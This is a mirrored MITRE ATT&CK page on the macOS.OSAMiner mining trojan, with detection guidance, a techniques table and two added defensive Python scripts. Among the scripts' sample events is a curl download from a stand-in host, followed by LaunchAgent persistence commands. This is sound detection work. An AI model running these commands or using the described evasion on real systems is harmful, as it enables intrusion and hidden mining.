S1048: macOS.OSAMiner
macOS.OSAMiner is a Monero mining trojan that was first observed in 2018; security researchers assessed that macOS.OSAMiner may have been circulating since at least 2015. macOS.OSAMiner is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.[1][2]
Analyst context for executives and security teams
macOS.OSAMiner matters because it shows how macOS malware can hide operationally important behavior inside AppleScript rather than relying on obvious binaries. For leaders, the risk is not just cryptocurrency mining; it is whether the organization can see script execution, persistence, downloads, and discovery activity on Macs well enough to investigate quickly.
Executive priority
Prioritize this as a macOS visibility and response-readiness test. Ask whether managed Macs produce usable evidence for AppleScript execution, Launch Agent persistence, launchctl activity, file ingress, discovery commands, and suspicious resource usage. This is especially relevant where Mac endpoints are used by executives, developers, or privileged users and where audit evidence depends on endpoint logging consistency.
Technical view
ATT&CK links macOS.OSAMiner to AppleScript execution, embedded and stripped payloads, process/system/storage discovery, ingress tool transfer, Launch Agent persistence, launchctl execution, system checks, and a defense-impairment relationship. SOC and IR teams should validate whether macOS telemetry captures osascript and AppleEvents-related execution, creation or modification of LaunchAgents plist files, launchctl usage, downloaded or transferred payloads, and discovery behavior. Because the official ATT&CK object provides no detection text, detections should be validated against local macOS administrative scripting baselines and not assumed from Windows-centric endpoint coverage.
Likely telemetry
- macOS process execution telemetry, especially osascript and launchctl activity
- AppleScript or AppleEvents-related execution evidence where available
- File creation and modification events for /Library/LaunchAgents and ~/Library/LaunchAgents plist files
- Network and file-transfer telemetry showing externally retrieved tools or payloads
- Endpoint file and script analysis artifacts for embedded or run-only AppleScript content
Detection direction
- Confirm that macOS endpoints generate searchable process, file, and persistence telemetry; do not rely only on generic malware signatures.
- Tune AppleScript detections around unusual osascript execution, nested or run-only scripts, and scripts that lead to downloads, discovery, or persistence changes.
- Monitor Launch Agent plist creation or modification together with launchctl execution to reduce false positives from legitimate software management activity.
- Correlate process discovery, system information discovery, local storage discovery, and ingress transfer rather than alerting on each behavior in isolation.
- Account for legitimate AppleScript automation by developers, IT administrators, and productivity tools when building allowlists.
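Added example, not code from the page, MITRE or the cited research: a small Python correlator that applies the bullets above to constructed macOS process and file-write events. Each event is classified against the behaviours listed in this page's ATT&CK rows, and an alert is raised only when an osascript execution is joined by several of them on the same host and user within a window; the event field names, regexes and sample events are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

# Behaviours taken from the ATT&CK relationships on this page, matched on normalised command lines.
BEHAVIOURS = {
    "applescript_exec": re.compile(r"\bosascript\b"),
    "ingress_transfer": re.compile(r"\bcurl\b.*\bhttps?://"),
    "storage_discovery": re.compile(r"(^|\s)df(\s|$)"),
    "system_checks": re.compile(r"\bsystem_profiler\b"),
    "process_discovery": re.compile(r"\bps\s+ax\b.*\|\s*grep\b"),
    "launchctl": re.compile(r"\blaunchctl\s+(load|bootstrap|kickstart|start)\b"),
}
LAUNCH_AGENT_PLIST = re.compile(r"/Library/LaunchAgents/[^/]+\.plist$")

def classify(event):
    """Return the behaviour labels one endpoint event matches (file writes: LaunchAgents plists only)."""
    if event["path"]:
        return {"launch_agent_persistence"} if LAUNCH_AGENT_PLIST.search(event["path"]) else set()
    return {name for name, pat in BEHAVIOURS.items() if pat.search(event["cmdline"])}

def correlate(events, window=timedelta(minutes=10), min_distinct=3):
    """Per host/user, open a window at each osascript run; alert only if >= min_distinct behaviours occur in it."""
    by_key = {}
    for e in events:
        by_key.setdefault((e["host"], e["user"]), []).append(e)
    alerts = []
    for (host, user), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        for i, anchor in enumerate(evs):
            if "applescript_exec" not in classify(anchor):
                continue
            seen = set().union(*(classify(e) for e in evs[i:] if e["ts"] - anchor["ts"] <= window))
            if len(seen) >= min_distinct:
                alerts.append({"host": host, "user": user, "first_seen": anchor["ts"], "behaviours": sorted(seen)})
                break  # one alert per host/user is enough to open a case
    return alerts

def ev(host, user, ts, cmdline="", path=""):
    return {"host": host, "user": user, "ts": datetime.fromisoformat(ts), "cmdline": cmdline, "path": path}

SAMPLE_EVENTS = [  # constructed sample telemetry, not real OSAMiner captures
    ev("mac-01", "alice", "2024-05-01T09:00:00", "osascript /Users/alice/Library/LaunchAgents/com.example.agent.plist"),
    ev("mac-01", "alice", "2024-05-01T09:00:05", "curl -s -o /tmp/p http://example.invalid/p"),
    ev("mac-01", "alice", "2024-05-01T09:00:07", "df -k /"),
    ev("mac-01", "alice", "2024-05-01T09:00:09", "system_profiler SPHardwareDataType"),
    ev("mac-01", "alice", "2024-05-01T09:00:11", "ps ax | grep 'Activity Monitor'"),
    ev("mac-01", "alice", "2024-05-01T09:00:12", path="/Users/alice/Library/LaunchAgents/com.example.agent.plist"),
    ev("mac-01", "alice", "2024-05-01T09:00:14", "launchctl load -w /Users/alice/Library/LaunchAgents/com.example.agent.plist"),
    ev("mac-02", "it-admin", "2024-05-01T10:00:00", "osascript -e 'display notification \"done\"'"),
]
```

The lone administrative osascript on mac-02 produces no alert, which is the point of correlating rather than alerting on each behaviour in isolation.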
Mitigation priorities
- Establish reliable macOS endpoint logging and retention before depending on detections for this behavior.
- Restrict and monitor persistence paths such as user and system LaunchAgents according to least privilege and change-control expectations.
- Harden script execution governance for AppleScript where business use allows, while documenting approved administrative automation.
- Improve file-transfer monitoring and egress review for Macs that can retrieve tools or payloads from external systems.
- Use endpoint management to maintain security tooling health and verify that Mac coverage is represented in compliance and incident-response evidence.
Analyst notes and limits
The strongest decision value is using this object as a macOS control-validation scenario: can the organization observe script-based execution, obfuscated or embedded payload handling, persistence, discovery, and inbound tool transfer on Apple endpoints? The supplied sources emphasize run-only AppleScript analysis challenges, so reverse-engineering and sandbox visibility may be a blind spot.
The official ATT&CK object does not provide detection guidance, aliases, labels, or object-level tactics. Guidance above is derived from the supplied description, external references, platform field, and listed uses relationships. Local environment evidence is required to determine prevalence, exposure, and detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1685 | Disable or Modify Tools | macOS.OSAMiner has searched for the Activity Monitor process in the System Events process list and kills the process if it is running. macOS.OSAMiner also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names. [1] |
| Enterprise | T1105 | Ingress Tool Transfer | macOS.OSAMiner has used `curl` to download Stripped Payloads from a public-facing adversary-controlled webpage. |
| Enterprise | T1680 | Local Storage Discovery | macOS.OSAMiner has checked to ensure there is enough disk space using the Unix utility `df`. [1] |
| Enterprise | T1497.001 | System Checks Sub-technique | macOS.OSAMiner can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores. [1] |
| Enterprise | T1027.008 | Stripped Payloads Sub-technique | macOS.OSAMiner has used run-only AppleScripts, a compiled and stripped form of AppleScript, to remove human-readable indicators and evade detection. [1] |
| Enterprise | T1027.009 | Embedded Payloads Sub-technique | macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads. [1] |
| Enterprise | T1082 | System Information Discovery | macOS.OSAMiner can gather the device serial number. [1] |
| Enterprise | T1543.001 | Launch Agent Sub-technique | macOS.OSAMiner has placed Stripped Payloads with a `plist` extension in the Launch Agents folder. [1] |
| Enterprise | T1569.001 | Launchctl Sub-technique | macOS.OSAMiner has used `launchctl` to restart the Launch Agent. [1] |
| Enterprise | T1057 | Process Discovery | macOS.OSAMiner has used `ps ax \| grep` |
| Enterprise | T1059.002 | AppleScript Sub-technique | macOS.OSAMiner has used `osascript` to call itself via the `do shell script` command in the Launch Agent `.plist` file. [1] |
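The Launch Agent, Launchctl and AppleScript rows above, together with the mitigation bullet on restricting and monitoring LaunchAgents paths, suggest a simple audit. The following is an added example, not code from the page, MITRE or the cited research: a Python script that walks LaunchAgents directories, flags files with a `.plist` name that actually start with the compiled AppleScript header, and flags real property lists whose ProgramArguments invoke `osascript` or `do shell script`. The `FasdUAS` header value is the compiled AppleScript signature; the fixture directory, file names and marker strings are assumptions of this example.

```python
import os
import plistlib
import tempfile

SCPT_MAGIC = b"FasdUAS"  # header that compiled AppleScript (.scpt) files start with, run-only ones included
SUSPICIOUS_MARKERS = ("osascript", "do shell script")

def audit_plist_file(path):
    """Return findings for one file in a LaunchAgents directory (empty list means nothing notable)."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith(SCPT_MAGIC):  # a compiled script parked under a .plist name, as OSAMiner did
        return ["compiled AppleScript stored with a .plist name"]
    try:
        agent = plistlib.loads(data)
    except Exception:
        return ["not a parseable property list"]
    joined = " ".join(str(a) for a in agent.get("ProgramArguments") or [])
    findings = [f"launch agent invokes {m!r}: {joined}" for m in SUSPICIOUS_MARKERS if m in joined]
    if findings and agent.get("RunAtLoad") and agent.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive keep the script resident")
    return findings

def audit_launch_agents(dirs):
    """Walk the given LaunchAgents directories and map each flagged file path to its findings."""
    report = {}
    for d in filter(os.path.isdir, dirs):
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            if name.endswith(".plist") and (findings := audit_plist_file(path)):
                report[path] = findings
    return report

def build_sample_dir():
    """Constructed fixtures: a benign agent, an osascript-driven agent, and a fake plist holding a script header."""
    d = tempfile.mkdtemp()
    benign = {"Label": "com.example.updater", "ProgramArguments": ["/usr/local/bin/updater", "--check"], "RunAtLoad": True}
    helper = {"Label": "com.example.helper", "RunAtLoad": True, "KeepAlive": True,
              "ProgramArguments": ["osascript", "/Users/alice/Library/Application Support/helper.plist"]}
    with open(os.path.join(d, "com.example.updater.plist"), "wb") as fh:
        plistlib.dump(benign, fh)
    with open(os.path.join(d, "com.example.helper.plist"), "wb") as fh:
        plistlib.dump(helper, fh)
    with open(os.path.join(d, "com.example.fake.plist"), "wb") as fh:
        fh.write(SCPT_MAGIC + b" 1.101.10" + b"\x00" * 16)  # constructed header only, not a runnable script
    return d
```

On a real Mac the directories to pass are `/Library/LaunchAgents` and each user's `~/Library/LaunchAgents`; treat findings as review items to compare against approved automation, not as verdicts.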
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | c60c087b64d5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] SentinelLabs reversing run-only applescripts 2021: Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.
- [2] VMRay OSAMiner dynamic analysis 2021: VMRAY. (2021, January 14). Malware Analysis Spotlight: OSAMiner Uses Run-Only AppleScripts to Evade Detection. Retrieved October 4, 2022.
- [3] mitre-attack S1048
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.